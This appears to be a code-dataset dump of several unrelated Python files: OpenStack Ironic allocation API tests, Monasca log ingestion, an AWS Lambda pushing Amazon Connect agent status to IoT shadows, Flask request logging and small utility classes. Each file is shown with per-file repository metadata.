response = self.post_json('/allocations', adict, headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.CREATED, response.status_int)
self.assertEqual(['CUSTOM_GPU', 'CUSTOM_FOO_BAR'],
response.json['traits'])
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=self.headers)
self.assertEqual(adict['uuid'], result['uuid'])
self.assertEqual(['CUSTOM_GPU', 'CUSTOM_FOO_BAR'],
result['traits'])
def test_create_allocation_invalid_trait(self):
adict = apiutils.allocation_post_data()
adict['traits'] = ['CUSTOM_GPU', 'FOO_BAR']
response = self.post_json('/allocations', adict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_create_allocation_invalid_candidate_node_format(self):
adict = apiutils.allocation_post_data(
candidate_nodes=['invalid-format'])
response = self.post_json('/allocations', adict, expect_errors=True,
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertTrue(response.json['error_message'])
def test_create_allocation_candidate_node_not_found(self):
adict = apiutils.allocation_post_data(
candidate_nodes=['1a1a1a1a-2b2b-3c3c-4d4d-5e5e5e5e5e5e'])
response = self.post_json('/allocations', adict, expect_errors=True,
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertTrue(response.json['error_message'])
def test_create_allocation_candidate_node_invalid(self):
adict = apiutils.allocation_post_data(
candidate_nodes=['this/is/not a/node/name'])
response = self.post_json('/allocations', adict, expect_errors=True,
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertTrue(response.json['error_message'])
def test_create_allocation_name_ok(self):
name = 'foo'
adict = apiutils.allocation_post_data(name=name)
self.post_json('/allocations', adict, headers=self.headers)
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=self.headers)
self.assertEqual(name, result['name'])
def test_create_allocation_name_invalid(self):
name = 'aa:bb_cc'
adict = apiutils.allocation_post_data(name=name)
response = self.post_json('/allocations', adict, headers=self.headers,
expect_errors=True)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
def test_create_by_node_not_allowed(self):
node = obj_utils.create_test_node(self.context)
adict = apiutils.allocation_post_data()
response = self.post_json('/nodes/%s/allocation' % node.uuid,
adict, headers=self.headers,
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.METHOD_NOT_ALLOWED, response.status_int)
def test_create_node_uuid_not_allowed(self):
node = obj_utils.create_test_node(self.context)
adict = apiutils.allocation_post_data()
adict['node_uuid'] = node.uuid
response = self.post_json('/allocations', adict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_create_allocation_owner(self):
owner = '12345'
adict = apiutils.allocation_post_data(owner=owner)
self.post_json('/allocations', adict, headers=self.headers)
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=self.headers)
self.assertEqual(owner, result['owner'])
def test_create_allocation_owner_not_allowed(self):
owner = '12345'
adict = apiutils.allocation_post_data(owner=owner)
response = self.post_json('/allocations', adict,
headers={api_base.Version.string: '1.59'},
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
def test_backfill(self):
node = obj_utils.create_test_node(self.context)
adict = apiutils.allocation_post_data(node=node.uuid)
response = self.post_json('/allocations', adict,
headers=self.headers)
self.assertEqual(http_client.CREATED, response.status_int)
self.assertNotIn('node', response.json)
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=self.headers)
self.assertEqual(adict['uuid'], result['uuid'])
self.assertEqual(node.uuid, result['node_uuid'])
self.assertNotIn('node', result)
def test_backfill_with_name(self):
node = obj_utils.create_test_node(self.context, name='backfill-me')
adict = apiutils.allocation_post_data(node=node.name)
response = self.post_json('/allocations', adict,
headers=self.headers)
self.assertEqual(http_client.CREATED, response.status_int)
self.assertNotIn('node', response.json)
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=self.headers)
self.assertEqual(adict['uuid'], result['uuid'])
self.assertEqual(node.uuid, result['node_uuid'])
self.assertNotIn('node', result)
def test_backfill_without_resource_class(self):
node = obj_utils.create_test_node(self.context,
resource_class='bm-super')
adict = {'node': node.uuid}
response = self.post_json('/allocations', adict,
headers=self.headers)
self.assertEqual(http_client.CREATED, response.status_int)
result = self.get_json('/allocations/%s' % response.json['uuid'],
headers=self.headers)
self.assertEqual(node.uuid, result['node_uuid'])
self.assertEqual('bm-super', result['resource_class'])
def test_backfill_copy_instance_uuid(self):
uuid = uuidutils.generate_uuid()
node = obj_utils.create_test_node(self.context,
instance_uuid=uuid,
resource_class='bm-super')
adict = {'node': node.uuid}
response = self.post_json('/allocations', adict,
headers=self.headers)
self.assertEqual(http_client.CREATED, response.status_int)
result = self.get_json('/allocations/%s' % response.json['uuid'],
headers=self.headers)
self.assertEqual(uuid, result['uuid'])
self.assertEqual(node.uuid, result['node_uuid'])
self.assertEqual('bm-super', result['resource_class'])
def test_backfill_node_not_found(self):
adict = apiutils.allocation_post_data(node=uuidutils.generate_uuid())
response = self.post_json('/allocations', adict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_backfill_not_allowed(self):
node = obj_utils.create_test_node(self.context)
headers = {api_base.Version.string: '1.57'}
adict = {'node': node.uuid}
response = self.post_json('/allocations', adict, expect_errors=True,
headers=headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
@mock.patch.object(policy, 'authorize', autospec=True)
def test_create_restricted_allocation(self, mock_authorize):
def mock_authorize_function(rule, target, creds):
if rule == 'baremetal:allocation:create':
raise exception.HTTPForbidden(resource='fake')
return True
mock_authorize.side_effect = mock_authorize_function
owner = '12345'
adict = apiutils.allocation_post_data()
headers = {api_base.Version.string: '1.60', 'X-Project-Id': owner}
response = self.post_json('/allocations', adict, headers=headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.CREATED, response.status_int)
self.assertEqual(owner, response.json['owner'])
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=headers)
self.assertEqual(adict['uuid'], result['uuid'])
self.assertEqual(owner, result['owner'])
@mock.patch.object(policy, 'authorize', autospec=True)
def test_create_restricted_allocation_older_version(self, mock_authorize):
def mock_authorize_function(rule, target, creds):
if rule == 'baremetal:allocation:create':
raise exception.HTTPForbidden(resource='fake')
return True
mock_authorize.side_effect = mock_authorize_function
owner = '12345'
adict = apiutils.allocation_post_data()
del adict['owner']
headers = {api_base.Version.string: '1.59', 'X-Project-Id': owner}
response = self.post_json('/allocations', adict, headers=headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.CREATED, response.status_int)
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=headers)
self.assertEqual(adict['uuid'], result['uuid'])
@mock.patch.object(policy, 'authorize', autospec=True)
def test_create_restricted_allocation_forbidden(self, mock_authorize):
def mock_authorize_function(rule, target, creds):
raise exception.HTTPForbidden(resource='fake')
mock_authorize.side_effect = mock_authorize_function
owner = '12345'
adict = apiutils.allocation_post_data()
headers = {api_base.Version.string: '1.60', 'X-Project-Id': owner}
response = self.post_json('/allocations', adict, expect_errors=True,
headers=headers)
self.assertEqual(http_client.FORBIDDEN, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
@mock.patch.object(policy, 'authorize', autospec=True)
def test_create_restricted_allocation_with_owner(self, mock_authorize):
def mock_authorize_function(rule, target, creds):
if rule == 'baremetal:allocation:create':
raise exception.HTTPForbidden(resource='fake')
return True
mock_authorize.side_effect = mock_authorize_function
owner = '12345'
adict = apiutils.allocation_post_data(owner=owner)
adict['owner'] = owner
headers = {api_base.Version.string: '1.60', 'X-Project-Id': owner}
response = self.post_json('/allocations', adict, headers=headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.CREATED, response.status_int)
self.assertEqual(owner, response.json['owner'])
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=headers)
self.assertEqual(adict['uuid'], result['uuid'])
self.assertEqual(owner, result['owner'])
@mock.patch.object(policy, 'authorize', autospec=True)
def test_create_restricted_allocation_with_mismatch_owner(
self, mock_authorize):
def mock_authorize_function(rule, target, creds):
if rule == 'baremetal:allocation:create':
raise exception.HTTPForbidden(resource='fake')
return True
mock_authorize.side_effect = mock_authorize_function
owner = '12345'
adict = apiutils.allocation_post_data(owner=owner)
adict['owner'] = '54321'
headers = {api_base.Version.string: '1.60', 'X-Project-Id': owner}
response = self.post_json('/allocations', adict, expect_errors=True,
headers=headers)
self.assertEqual(http_client.FORBIDDEN, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
@mock.patch.object(rpcapi.ConductorAPI, 'destroy_allocation')
class TestDelete(test_api_base.BaseApiTest):
headers = {api_base.Version.string: str(api_v1.max_version())}
def setUp(self):
super(TestDelete, self).setUp()
self.node = obj_utils.create_test_node(self.context)
self.allocation = obj_utils.create_test_allocation(
self.context, node_id=self.node.id, name='alloc1')
self.mock_get_topic = self.useFixture(
fixtures.MockPatchObject(rpcapi.ConductorAPI, 'get_random_topic')
).mock
@mock.patch.object(notification_utils, '_emit_api_notification')
def test_delete_allocation_by_id(self, mock_notify, mock_destroy):
self.delete('/allocations/%s' % self.allocation.uuid,
headers=self.headers)
self.assertTrue(mock_destroy.called)
mock_notify.assert_has_calls([
mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START,
node_uuid=self.node.uuid),
mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.END,
node_uuid=self.node.uuid),
])
@mock.patch.object(notification_utils, '_emit_api_notification')
def test_delete_allocation_node_locked(self, mock_notify, mock_destroy):
self.node.reserve(self.context, 'fake', self.node.uuid)
mock_destroy.side_effect = exception.NodeLocked(node='fake-node',
host='fake-host')
ret = self.delete('/allocations/%s' % self.allocation.uuid,
expect_errors=True, headers=self.headers)
self.assertEqual(http_client.CONFLICT, ret.status_code)
self.assertTrue(ret.json['error_message'])
self.assertTrue(mock_destroy.called)
mock_notify.assert_has_calls([
mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START,
node_uuid=self.node.uuid),
mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.ERROR,
obj_fields.NotificationStatus.ERROR,
node_uuid=self.node.uuid),
])
def test_delete_allocation_invalid_api_version(self, mock_destroy):
response = self.delete('/allocations/%s' % self.allocation.uuid,
expect_errors=True,
headers={api_base.Version.string: '1.14'})
self.assertEqual(http_client.METHOD_NOT_ALLOWED, response.status_int)
def test_delete_allocation_invalid_api_version_without_check(self,
mock_destroy):
# Invalid name, but the check happens after the microversion check.
response = self.delete('/allocations/ba!na!na1',
expect_errors=True,
headers={api_base.Version.string: '1.14'})
self.assertEqual(http_client.METHOD_NOT_ALLOWED, response.status_int)
def test_delete_allocation_by_name(self, mock_destroy):
self.delete('/allocations/%s' % self.allocation.name,
headers=self.headers)
self.assertTrue(mock_destroy.called)
def test_delete_allocation_by_name_with_json(self, mock_destroy):
self.delete('/allocations/%s.json' % self.allocation.name,
headers=self.headers)
self.assertTrue(mock_destroy.called)
def test_delete_allocation_by_name_not_existed(self, mock_destroy):
res = self.delete('/allocations/%s' % 'blah', expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.NOT_FOUND, res.status_code)
@mock.patch.object(notification_utils, '_emit_api_notification')
def test_delete_allocation_by_node(self, mock_notify, mock_destroy):
self.delete('/nodes/%s/allocation' % self.node.uuid,
headers=self.headers)
self.assertTrue(mock_destroy.called)
mock_notify.assert_has_calls([
mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START,
node_uuid=self.node.uuid),
mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.END,
node_uuid=self.node.uuid),
])
def test_delete_allocation_by_node_not_existed(self, mock_destroy):
node = obj_utils.create_test_node(self.context,
uuid=uuidutils.generate_uuid())
res = self.delete('/nodes/%s/allocation' % node.uuid,
expect_errors=True, headers=self.headers)
self.assertEqual(http_client.NOT_FOUND, res.status_code)
def test_delete_allocation_invalid_node(self, mock_destroy):
res = self.delete('/nodes/%s/allocation' % uuidutils.generate_uuid(),
expect_errors=True, headers=self.headers)
self.assertEqual(http_client.NOT_FOUND, res.status_code)
def test_delete_allocation_by_node_invalid_api_version(self, mock_destroy):
obj_utils.create_test_allocation(self.context, node_id=self.node.id)
response = self.delete(
'/nodes/%s/allocation' % self.node.uuid,
headers={api_base.Version.string: str(api_v1.min_version())},
expect_errors=True)
self.assertEqual(http_client.NOT_FOUND, response.status_int)
self.assertFalse(mock_destroy.called)
| 48.79798
| 79
| 0.60357
|
745727e1a86b6e0796582eda1945544ceaf05a40
| 1,101
|
py
|
Python
|
mpf/core/scriptlet.py
|
pmansukhani/mpf
|
0979965d24bcaba9423b43581c6a18b847b1b900
|
[
"MIT"
] | null | null | null |
mpf/core/scriptlet.py
|
pmansukhani/mpf
|
0979965d24bcaba9423b43581c6a18b847b1b900
|
[
"MIT"
] | null | null | null |
mpf/core/scriptlet.py
|
pmansukhani/mpf
|
0979965d24bcaba9423b43581c6a18b847b1b900
|
[
"MIT"
] | null | null | null |
"""Contains the parent class for DEPRECATED Scriptlets.
This is deprecated and will be removed in config_version 6 with MPF 0.60.
Use custom code instead.
"""
from mpf.core.delays import DelayManager
from mpf.core.logging import LogMixin
class Scriptlet(LogMixin):
"""Baseclass for DEPRECATED scriptlets which are simple scripts in a machine.
This is deprecated and will be removed in config_version 6 with MPF 0.60.
Use custom code instead.
"""
def __init__(self, machine, name):
"""Initialise scriptlet."""
super().__init__()
self.machine = machine
self.name = name
self.configure_logging('Scriptlet.' + name, 'basic', 'full')
self.delay = DelayManager(self.machine)
self.on_load()
def __repr__(self):
"""Return string representation."""
return '<Scriptlet.{}>'.format(self.name)
def on_load(self):
"""Automatically called when this Scriptlet loads.
It's the intention that the Scriptlet writer will overwrite this method
in the Scriptlet.
"""
pass
| 28.230769
| 81
| 0.66485
|
a61dfd0922fa697af679445ee2b86d173e490ae8
| 355
|
py
|
Python
|
source/appModules/winal.py
|
riku22/nvdajp
|
66a828ea89d317e4aa0ad2aed4b3b1e08920afb6
|
[
"bzip2-1.0.6"
] | 19
|
2016-05-11T05:15:31.000Z
|
2022-03-17T12:40:10.000Z
|
source/appModules/winal.py
|
riku22/nvdajp
|
66a828ea89d317e4aa0ad2aed4b3b1e08920afb6
|
[
"bzip2-1.0.6"
] | 307
|
2015-08-27T11:22:33.000Z
|
2022-03-29T10:43:34.000Z
|
source/appModules/winal.py
|
riku22/nvdajp
|
66a828ea89d317e4aa0ad2aed4b3b1e08920afb6
|
[
"bzip2-1.0.6"
] | 14
|
2016-03-28T07:31:49.000Z
|
2022-03-30T04:56:35.000Z
|
#appModules/ALTAIR for Windows.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2012 Tomohiro Saito
"""App module for ALTAIR for Windows
"""
import appModuleHandler
class AppModule(appModuleHandler.AppModule):
sleepMode=True
| 22.1875
| 57
| 0.749296
|
0cbd6abf0d8addc9af6d9e2cf2c461408ba97f41
| 1,173
|
py
|
Python
|
tests/test_visitors/test_ast/test_subscripts/test_float_key_usage.py
|
cdhiraj40/wemake-python-styleguide
|
7cef9be081d594c30045b7a98cae77a9be46e1aa
|
[
"MIT"
] | 1,931
|
2018-03-17T13:52:45.000Z
|
2022-03-27T09:39:17.000Z
|
tests/test_visitors/test_ast/test_subscripts/test_float_key_usage.py
|
cdhiraj40/wemake-python-styleguide
|
7cef9be081d594c30045b7a98cae77a9be46e1aa
|
[
"MIT"
] | 2,231
|
2018-03-09T21:19:05.000Z
|
2022-03-31T08:35:37.000Z
|
tests/test_visitors/test_ast/test_subscripts/test_float_key_usage.py
|
cdhiraj40/wemake-python-styleguide
|
7cef9be081d594c30045b7a98cae77a9be46e1aa
|
[
"MIT"
] | 492
|
2018-05-18T21:20:28.000Z
|
2022-03-20T14:11:50.000Z
|
import pytest
from wemake_python_styleguide.violations.best_practices import FloatKeyViolation
from wemake_python_styleguide.visitors.ast.subscripts import CorrectKeyVisitor
usage_template = 'some_dict[{0}]'
@pytest.mark.parametrize('expression', [
'1.0',
'-0.0',
'+3.5',
])
def test_float_key_usage(
assert_errors,
parse_ast_tree,
expression,
default_options,
):
"""Testing that redundant subscripts are forbidden."""
tree = parse_ast_tree(usage_template.format(expression))
visitor = CorrectKeyVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [FloatKeyViolation])
@pytest.mark.parametrize('expression', [
'5',
'name',
'call()',
'name.attr',
'name[sub]',
'...',
'"str"',
'b""',
'3j',
'5 + 0.1',
'3 / 2',
])
def test_correct_subscripts(
assert_errors,
parse_ast_tree,
expression,
default_options,
):
"""Testing that non-redundant subscripts are allowed."""
tree = parse_ast_tree(usage_template.format(expression))
visitor = CorrectKeyVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [])
| 21.327273
| 80
| 0.674339
|
539a7b7682427f2f809c69b0cf1dc92133633778
| 3,030
|
py
|
Python
|
monasca_api/v2/reference/logs.py
|
MheniMerz/monasca-api
|
9c0892a58622082ed8baf81ee2f621cc68f5b42c
|
[
"Apache-2.0"
] | 50
|
2015-10-18T02:54:52.000Z
|
2021-12-05T07:54:08.000Z
|
monasca_api/v2/reference/logs.py
|
MheniMerz/monasca-api
|
9c0892a58622082ed8baf81ee2f621cc68f5b42c
|
[
"Apache-2.0"
] | 13
|
2015-10-29T12:54:07.000Z
|
2021-09-02T06:17:42.000Z
|
monasca_api/v2/reference/logs.py
|
MheniMerz/monasca-api
|
9c0892a58622082ed8baf81ee2f621cc68f5b42c
|
[
"Apache-2.0"
] | 81
|
2015-10-21T07:43:30.000Z
|
2022-01-07T03:35:05.000Z
|
# Copyright 2016 Hewlett Packard Enterprise Development Company, L.P.
# Copyright 2016-2017 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import falcon
from oslo_log import log
from monasca_api.api.core.log import exceptions
from monasca_api.api.core.log import validation
from monasca_api.api import logs_api
from monasca_api import conf
from monasca_api.v2.common import bulk_processor
from monasca_api.v2.reference import helpers
CONF = conf.CONF
LOG = log.getLogger(__name__)
class Logs(logs_api.LogsApi):
VERSION = 'v2.0'
SUPPORTED_CONTENT_TYPES = {'application/json'}
def __init__(self):
super(Logs, self).__init__()
self._processor = bulk_processor.BulkProcessor()
def on_post(self, req, res):
helpers.validate_json_content_type(req)
helpers.validate_authorization(req, ['api:logs:post'])
helpers.validate_payload_size(req.content_length)
self.process_on_post_request(req, res)
def process_on_post_request(self, req, res):
try:
request_body = helpers.from_json(req)
log_list = self._get_logs(request_body)
global_dimensions = self._get_global_dimensions(request_body)
except Exception as ex:
LOG.error('Entire bulk package has been rejected')
LOG.exception(ex)
raise ex
tenant_id = (req.cross_project_id if req.cross_project_id
else req.project_id)
try:
self._processor.send_message(
logs=log_list,
global_dimensions=global_dimensions,
log_tenant_id=tenant_id
)
except Exception as ex:
res.status = getattr(ex, 'status', falcon.HTTP_500)
return
res.status = falcon.HTTP_204
@staticmethod
def _get_global_dimensions(request_body):
"""Get the top level dimensions in the HTTP request body."""
global_dims = request_body.get('dimensions', {})
validation.validate_dimensions(global_dims)
return global_dims
@staticmethod
def _get_logs(request_body):
"""Get the logs in the HTTP request body."""
if request_body is None:
raise falcon.HTTPBadRequest('Bad request',
'Request body is Empty')
if 'logs' not in request_body:
raise exceptions.HTTPUnprocessableEntity(
'Unprocessable Entity Logs not found')
return request_body['logs']
| 33.666667
| 75
| 0.674917
|
291e51bdd3d991b1f8addfff5dac0dfa840480f5
| 223
|
py
|
Python
|
Python/UberX.py
|
Gera-Garza/POO_practica
|
480af9ec9e5edbc33f1b18083a1bd85aff8d7c64
|
[
"Artistic-1.0-cl8"
] | null | null | null |
Python/UberX.py
|
Gera-Garza/POO_practica
|
480af9ec9e5edbc33f1b18083a1bd85aff8d7c64
|
[
"Artistic-1.0-cl8"
] | null | null | null |
Python/UberX.py
|
Gera-Garza/POO_practica
|
480af9ec9e5edbc33f1b18083a1bd85aff8d7c64
|
[
"Artistic-1.0-cl8"
] | null | null | null |
from car import Car
class UberX(Car):
brand = str
model = str
def __init__(self, license, driver, brand , model):
super().__init__(license, driver)
self.brand = brand
self.model = model
| 22.3
| 55
| 0.61435
|
888458e3eb8df61d32dcd71b7bb4d76e91ed3215
| 1,862
|
py
|
Python
|
Amazon_Connect-Agent_Status/Agent_Status-Cloud_App/lambda_stream/index.py
|
aws-iot-edukit/Other_Examples-Core2_for_AWS
|
c224148feb7398a2e0b3486cba4ff24fa4f4db40
|
[
"MIT-0",
"MIT"
] | 4
|
2021-07-27T13:37:20.000Z
|
2021-09-15T16:49:15.000Z
|
Amazon_Connect-Agent_Status/Agent_Status-Cloud_App/lambda_stream/index.py
|
aws-iot-edukit/Other_Examples-Core2_for_AWS
|
c224148feb7398a2e0b3486cba4ff24fa4f4db40
|
[
"MIT-0",
"MIT"
] | null | null | null |
Amazon_Connect-Agent_Status/Agent_Status-Cloud_App/lambda_stream/index.py
|
aws-iot-edukit/Other_Examples-Core2_for_AWS
|
c224148feb7398a2e0b3486cba4ff24fa4f4db40
|
[
"MIT-0",
"MIT"
] | 2
|
2021-07-27T13:51:08.000Z
|
2021-09-12T19:57:47.000Z
|
import json
import boto3
import base64
import os
TABLE_NAME = os.environ['TABLE_NAME']
dynamodb_client = boto3.client('dynamodb')
iotdata_client = boto3.client('iot-data', region_name='eu-west-1')
def get_record(AgentARN):
try:
response = dynamodb_client.query(
TableName=TABLE_NAME,
KeyConditionExpression='AgentARN = :AgentARN',
ExpressionAttributeValues={':AgentARN': {'S': AgentARN } }
)
except:
return 1,'dynamodb_client'
return 0,response
def publish_shadow(device,record):
if record['CurrentAgentSnapshot']['AgentStatus']['Name'] == "Available":
record['CurrentAgentSnapshot']['AgentStatus']['Name'] = 'AVAILABLE'
elif record['CurrentAgentSnapshot']['AgentStatus']['Name'] == "Offline":
record['CurrentAgentSnapshot']['AgentStatus']['Name'] = 'OFFLINE00'
try:
response = iotdata_client.update_thing_shadow(
thingName=device,
payload = json.dumps({
'state': { 'desired': record['CurrentAgentSnapshot']['AgentStatus'] }
})
)
except:
return 1,'publish_shadow'
return 0,response
def lambda_handler(event, context):
#print(json.dumps(event))
for record in event['Records']:
record = json.loads(base64.b64decode(record['kinesis']['data']).decode('ascii'))
error,response = get_record(record['AgentARN'])
if error > 0:
return { 'status' : 'ERROR:'+response }
error,response = publish_shadow(response['Items'][0]['client_id']['S'],record)
if error > 0:
return { 'status' : 'ERROR:'+response }
#print(response['Items'][0]['client_id']['S'])
print(record['CurrentAgentSnapshot']['AgentStatus']['Name'])
return { 'status' : 'ok' }
| 30.032258
| 88
| 0.604189
|
791b79d537ebf6c13c91a18c29865ae8b286bc8e
| 4,075
|
py
|
Python
|
api_restful/urls.py
|
zhanghe06/bearing_project
|
78a20fc321f72d3ae05c7ab7e52e01d02904e3fc
|
[
"MIT"
] | 1
|
2020-06-21T04:08:26.000Z
|
2020-06-21T04:08:26.000Z
|
api_restful/urls.py
|
zhanghe06/bearing_project
|
78a20fc321f72d3ae05c7ab7e52e01d02904e3fc
|
[
"MIT"
] | 13
|
2019-10-18T17:19:32.000Z
|
2022-01-13T00:44:43.000Z
|
api_restful/urls.py
|
zhanghe06/bearing_project
|
78a20fc321f72d3ae05c7ab7e52e01d02904e3fc
|
[
"MIT"
] | 5
|
2019-02-07T03:15:16.000Z
|
2021-09-04T14:06:28.000Z
|
#!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: urls.py
@time: 2020-02-28 21:21
"""
from __future__ import unicode_literals
from uuid import uuid4
import logging
import time
from collections import defaultdict
from flask import jsonify, request, g, make_response
from werkzeug.exceptions import NotFound, InternalServerError
from api_restful.signals.operation_log import signal_operation_log
from api_restful import app
# api_logger = logging.getLogger('api')
debug_logger = logging.getLogger('debug')
SUCCESS_MSG = app.config['API_SUCCESS_MSG']
FAILURE_MSG = app.config['API_FAILURE_MSG']
@app.before_request
def api_before_request():
request_id = request.headers.get('X-Request-Id', str(uuid4())) # 不带短横: uuid4().get_hex()
g.request_id = request_id
debug_logger.debug('before_request')
g.req_time = time.time()
@app.after_request
def after_request(response):
request_id = g.get('request_id', str(uuid4()))
g.request_id = request_id
debug_logger.debug('after_request')
# 头部注入
response.headers.add('X-Request-Id', request_id)
g.status_code = response.status_code
g.project = app.name
g.res_time = time.time()
latency = time.time() - g.req_time
g.latency = latency
# api_log = defaultdict(lambda: '-')
# api_logger.info('-')
# 操作日志
operation_log = {
'project': app.name,
'latency': latency,
'client_host': request.host,
'client_addr': request.remote_addr,
'req_id': request_id,
'req_method': request.method,
'req_path': request.path,
'req_json': request.json,
'req_args': request.args.to_dict(),
'res_status_code': response.status_code,
'res_json': {},
}
# Get请求错误时记录返回,正确返回忽略,避免日志过大
if request.method in ['GET', 'HEAD', 'OPTIONS'] and response.status_code / 2 != 100:
operation_log['res_json'] = response.json
if request.method in ['POST', 'PUT', 'DELETE']:
operation_log['res_json'] = response.json
signal_operation_log.send(app, **operation_log)
return response # 必须返回response
# @app.after_request
# def after_request(response):
# request_id = g.get('request_id', str(uuid4()))
# g.request_id = request_id
# debug_logger.debug('after_request')
#
# g.status_code = response.status_code
#
# # 头部注入
# response.headers.add('X-Request-Id', request_id)
#
# return response # 必须返回response
# @app.teardown_request
# def teardown_request(exception=None):
# request_id = g.get('request_id', str(uuid4()))
# g.request_id = request_id
# debug_logger.debug('teardown_request')
#
# g.project = app.name
# g.res_time = time.time()
# g.latency = g.res_time - g.req_time
#
# # 接口日志
# g.api_log = defaultdict(lambda: '-')
# g.api_log['project_name'] = app.name
#
# if exception:
# exception_info = {
# 'module': exception.__class__.__module__,
# 'name': exception.__class__.__name__,
# 'message': exception.message,
# }
# g.api_log['exception'] = '%(module)s.%(name)s: %(message)s' % exception_info
# api_logger.error(dict(g.api_log))
# else:
# api_logger.info(dict(g.api_log))
# return exception
@app.route('/', methods=['GET', 'POST', 'OPTIONS'])
def heartbeat():
return jsonify(SUCCESS_MSG.copy())
# 全局路由错误
@app.errorhandler(NotFound.code)
def url_not_found(error):
return make_response(
jsonify(
{
'msg': '路径错误' or error.description,
'result': False,
# 'status': exceptions.NotFound.code,
}
),
NotFound.code
)
# 全局异常错误(DEBUG模式生效)
@app.errorhandler(Exception)
def exception(error):
return make_response(
jsonify(
{
'msg': error.message or InternalServerError.description,
'result': False,
# 'status': InternalServerError.code,
}
),
InternalServerError.code
)
| 26.809211
| 93
| 0.635092
|
12102831af8891cb28bfbe6f3c07bef6a4dc80b3
| 2,445
|
py
|
Python
|
projectenv/scriptgen.py
|
teaminsight-legacy/projectenv
|
873de28986dd4816e4872462b6280a1aed6d2922
|
[
"MIT"
] | 1
|
2016-11-02T22:35:11.000Z
|
2016-11-02T22:35:11.000Z
|
projectenv/scriptgen.py
|
teaminsight-legacy/projectenv
|
873de28986dd4816e4872462b6280a1aed6d2922
|
[
"MIT"
] | null | null | null |
projectenv/scriptgen.py
|
teaminsight-legacy/projectenv
|
873de28986dd4816e4872462b6280a1aed6d2922
|
[
"MIT"
] | null | null | null |
import os
from logger import log, DEBUG
class ScriptGenerator(object):
def __init__(self, environment_vars={}):
self.env = environment_vars
def script(self, language='sh'):
header_lines = [
'#!/bin/%s' % language,
'# Auto-generated by projectenv'
]
env_lines = []
for k, v in self.env.iteritems():
line = getattr(self, '_write_env_var_%s' % language)(k, v)
env_lines.append(line)
# We are relying on the fact that sorting is stable as of python>=2.3
env_lines.sort(key=self._script_order_key)
return '\n'.join(header_lines + env_lines)
def write(self, file_name):
for language in ['sh', 'csh']:
self._write(file_name, language)
def _write(self, file_name, language):
file_name += '.' + language
log('writing script', file_name)
f = open(file_name, 'w+')
if f:
try:
script = self.script(language)
log(None, ' >> ' + script.replace('\n', '\n >> ') + '\n')
if not DEBUG:
f.write(script + '\n')
finally:
f.close()
def _write_env_var_sh(self, name, value):
if value:
return 'export %s=%s' % (name, value)
else:
return 'unset %s' % name
def _write_env_var_csh(self, name, value):
if value:
return 'setenv %s %s' % (name, value)
else:
return 'unsetenv %s' % name
def _script_order_key(self, line):
"""
export/setenv commands must be in the correct order to prevent the
possibility of restoring an environment variable to the wrong value
"""
# the original environment vars should be saved first
if (line.startswith('export _PROJECTENV_') or
line.startswith('setenv _PROJECTENV_')):
return 1
# next the remaining environment vars should be set
elif line.startswith('export') or line.startswith('setenv'):
return 2
# unsetting the prefixed environment variables should be done last
elif line.startswith('unset _PROJECTENV_') or line.startswith('unsetenv _PROJECTENV_'):
return 4
# unsetting environment vars only happen once all of the environment
# vars that should be set have been set
else:
return 3
| 33.493151
| 95
| 0.570961
|
